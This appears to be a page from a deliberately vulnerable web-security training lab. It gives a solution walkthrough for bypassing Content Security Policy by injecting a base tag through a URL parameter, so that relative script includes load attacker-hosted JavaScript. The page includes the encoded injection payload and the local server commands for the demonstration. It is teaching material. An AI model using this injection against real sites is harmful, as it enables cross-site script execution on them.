<!doctype html>
<html lang="en">

<head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css"
        integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous">
    <title>Vulnerable CSP Examples</title>
</head>

<body>
    <div class="container">
        <div class="p-3 mb-2 bg-secondary text-white">
            <h1>Solution 1</h1>
            <div class="p-3 mb-2 bg-light text-dark">
                The base href can be defined by an attacker making all external JavaScript files reference to the
                malicious website, to achieve this exploit:.</br></br>

                1. Host a local or external javascript file which serves a file with the path /javascripts/foo.js with
                the payload alert(1)</br></br>
                Locally run code with Python: </br>
                python -m SimpleHTTPServer 3000<br /><br />
                Locally run code with Node:<br />
                npm installl -g serve<br />
                serve -p 3000<br /><br>

                2.
                Load a base href to a URL you control e.g for this, localhost ?payload=%22%3E%3Cbase
                href="//127.0.0.1:3000"></br></br>

                3. See the resource attempt to load to the malicious website and execute the JavaScript
            </div>

            <a class="btn btn-light" href="/">
                Back
            </a>
            <script src="/javascripts/foo.js"></script>

            <script src="https://code.jquery.com/jquery-3.3.1.slim.min.js"
                integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo"
                crossorigin="anonymous"></script>
            <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js"
                integrity="sha384-UO2eT0CpHqdSJQ6hJty5KVphtPhzWj9WO1clHTMGa3JDZwrnQq4sF86dIHNDz0W1"
                crossorigin="anonymous"></script>
            <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js"
                integrity="sha384-JjSmVgyd0p3pXB1rRibZUAYoIIy6OrQ6VrjIEaFf/nJGzIxFDsf4x0xIM+B07jRM"
                crossorigin="anonymous"></script>
</body>

</html>